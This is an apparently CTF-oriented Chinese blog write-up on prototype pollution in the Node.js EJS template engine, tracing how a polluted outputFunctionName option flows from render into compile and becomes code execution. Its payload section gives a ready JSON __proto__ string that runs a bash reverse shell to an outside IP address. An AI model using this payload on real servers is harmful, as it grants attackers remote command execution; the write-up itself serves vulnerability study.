[Web/Nodejs]原型链污染EJS模块的利用分析(附源码分析)

已于 2022-04-06 21:27:46 修改
阅读量1.9k 收藏 1
点赞数 1
分类专栏: # Web安全 文章标签: web安全 nodejs
于 2022-04-06 21:24:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/darknotes/article/details/124000520
版权
EJS _CVE-2019-10744(outputFunctionName)

在EJS引擎当中,存在一个属性opts.outputFunctionName

(注:影响该位置的源数据流实际上有很多个,这个属性利用条件相对宽松,只要有就能用)

读源码

ejs作为渲染引擎,包含一些代码执行的功能,帮助将执行结果回显到页面。

【以下代码为exports.render-----调用----->handleCache

首先调用了render的话(在我们做题时可以看到的表层函数)请添加图片描述
render调用的handleCache中跟进调用了compile(记住,关键点)
请添加图片描述
【以下代码包含在ejscompile函数中】

// 输出解析后的html字符串
语法:ejs.compile(str,options);
参数参数说明
str这个是用来渲染的数据展示区域
opstions这是个额外的参数配置,可以省略,详见后面

请添加图片描述请添加图片描述
恰巧this.source是拼接而成的,在包含opts.outputFunctionName时会将其包含在内,动态拼接一个js语句字符串,这是十分危险的,因为在后续步骤中,会利用this.src构造可调用函数。
请添加图片描述请添加图片描述
因此操纵opts.outputFunctionName即可构造预期函数,实现RCE。

如下图,compile在此处会被调用并作为返回值返回,导致渲染变为代码执行。
请添加图片描述
也就是说,我们对{}原型进行污染添加opts.outputFunctionName属性(主要为了污染opts)下的恶意代码,就能利用渲染函数render的调用链,转为代码执行。

Payload

由源码知,

this.source = prepended + this.source + appended;
prepended += '  var ' + opts.outputFunctionName + ' = __append;' + '\n';

构造合适的opts.outputFunctionName,

a=2333;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/121.36.96.230/2333 0>&1\"');var __tmp2

整理为

{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/121.36.96.230/2333 0>&1\"');var __tmp2"}}
車鈊
关注
专栏目录
web安全Nodejs原型链污染分析
「 虚幻私塾」
02-14 848
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 Nodejs原型链污染分析 什么是js原型? 可以将js原型理解为其他OOP语言中的类,但还是有细微区别。 1. function F(){...} 2. var f = new F(); 分析: 1.创建一个func F,同时创立了一个F对象(该对象默认是接着Object的原
Nodejs原型链污染
发果叁
03-31 294
有一些人在学习JavaScript时会分不清Nodejs和JavaScript之间的区别,如果没有node,那么我们的JavaScript代码则由浏览器中的JavaScript解析器进行解析。几乎所有的浏览器都配备了JavaScript的解析功能(最出名的就是google的v8), 这也是为什么我们能在f12中直接执行JavaScript的原因。而Nodejs则是由这个解析器单独从浏览器中拿出来,并进行了一系列的处理,最后成为了一个可以在服务端运行JavaScript的环境。
node.js原型链污染漏洞
weixin_43610673的博客
02-27 2755
node.js入门:http://nodejs.cn/learn/how-much-javascript-do-you-need-to-know-to-use-nodejs 根据上面说明要掌握的JavaScript部分直接看菜鸟教程学。 对象与原型链 JavaScript当中的所有事物都是对象:字符串、数值、数组、函数。对象只是一种特殊的数据。对象拥有属性和方法。 可以这样创建一个对象 var person = {firstName:"John", lastName:"Doe", age:50, eyeCo
EJS模板引擎
最新发布
qq_61649188的博客
08-28 463
可能在这大家会觉得该方法不如原生方法来的简便,最后的实现结果都是一样的,但是这里用ejs渲染后做到了将HTML和JS的分离,这样就可以实现后面的操作。首先,我创建一个html文件,我将今天是 <%= time %>放入到该HTML文件中,通过fs读取html文件。那么接下来我们还可以实现什么样的操作呢,没错,我们可以将html的内容完成一个补充,还可以添加元素。EJS是一个简单而强大的模板引擎,适用于需要在HTML中嵌入动态内容的场景。需要先引入模块ejs,这里的<%= %>是ejs的基本语法中的一种,
ejs原型链污染rce分析
lastwinn的博客
02-07 882
记录自己的所学以及理解
ejs默认配置 原型链污染
rev1ve的博客
01-06 1222
我们已经知道当编译模板时,它会使用多个配置元素来处理模板中的代码片段,并将其转换为可执行的 JavaScript 函数。不过其中大多数都使用。因此,对于用户提供的对象来说情况并非如此,从 EJS 维护者的角度来看,用户向库提供的输入不是 EJS 的责任。所有这些都发生在最终被调用的 Template 类的编译函数中,在这种情况下,当创建模板对象时,将使用受感染的选项。路由下,接收GET参数并赋值给data变量,然后黑名单检测,调用ejs模板进行渲染其中解析data的json数据,说明ejs配置可控。
nodejs——原型链污染
m0_73756016的博客
06-12 1027
参考滑动验证页面。
Nodejs+express+ejs简单使用实例代码
10-19
在本文中,我们将探讨如何使用Node.js、Express框架和EJS模板引擎来构建一个简单的Web应用。首先,我们需要了解这三个核心组件。 1. **Node.js**: Node.js是一个基于Chrome V8引擎的JavaScript运行环境,它允许...
nodejs基础之常用工具模块util用法分析
01-02
本文实例讲述了nodejs基础之常用工具模块util用法。分享给大家供大家参考,具体如下: util是nodejs的核心模块,提供常用函数的集合,用户弥补核心javascript的功能过于精简的不足 util.inherits 是一个实现对象间...
Nodejs 搭建简单的Web服务器详解及实例
01-20
使用Nodejs搭建Web服务器是学习Node.js比较全面的入门教程,因为要完成一个简单的Web服务器,你需要学习Nodejs中几个比较重要的模块,比如:http协议模块、文件系统、url解析模块、路径解析模块、以及301重定向问题...
浅析嵌入式 JS 模板引擎之EJS
01-08
EJS是一套既简单又高效的嵌入式 JS模板语言,可以帮我们利用普通的 JS 代码生成 HTML 页面。其历史悠久,曾一度得到些许大佬的青睐,现在虽然没有vue、react这些项目流行,但其还是有一定的使用场合和学习价值的。 EJS后缀名为”ejsEJS 支持我们把JS代码直接写在标签内 EJS 能够缓存 JS函数的中间代码,使执行速度得到极大的提升 EJS 调错极其简单:因为它所有错误都是普通的 JS 异常,而且也会给我们输出异常发生的具体位置 EJS能够快速编译与绘制输出,并且其标签很简洁,如: EJS能够自定义分割符,如:用 替换 EJS同时支持服务器端和浏览器 JS 环境 EJS
NodeJS原型链污染
Aiwin的博客
05-11 1312
NodeJS原型链污染
nodejs原型链污染
yink12138的博客
01-10 3362
nodejs原型链污染
浅谈 Nodejs原型链污染
weixin_63231007的博客
03-07 1449
nodejs原型链污染原理及利用
nodejs原型链污染基础
qq_63928796的博客
02-06 762
原型链污染是一种针对JavaScript运行时的注入攻击。通过原型链污染,攻击者可能控制对象属性的默认值。这允许攻击者篡改应用程序的逻辑,还可能导致拒绝服务,或者在极端情况下,远程执行代码。比较出名的一个原型链污染漏洞,是在2019年初,在Snyk的安全研究人员透露出流行的JavaScript库—Lodash的严重的漏洞,这允许黑客攻击多个web应用程序。漏洞细节:https://security.snyk.io/vuln/SNYK-JS-LODASH-450202。
Node.js基础+原型链污染
2301_79688134的博客
03-15 844
概述:简单来说Node.js就是运行在服务端的JavaScript,Node.js是一个基于Chrome JavaScript运行时建立的一个平台。
node.js原型链污染小结
qq_61209261的博客
07-16 797
node.js原型链小结
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值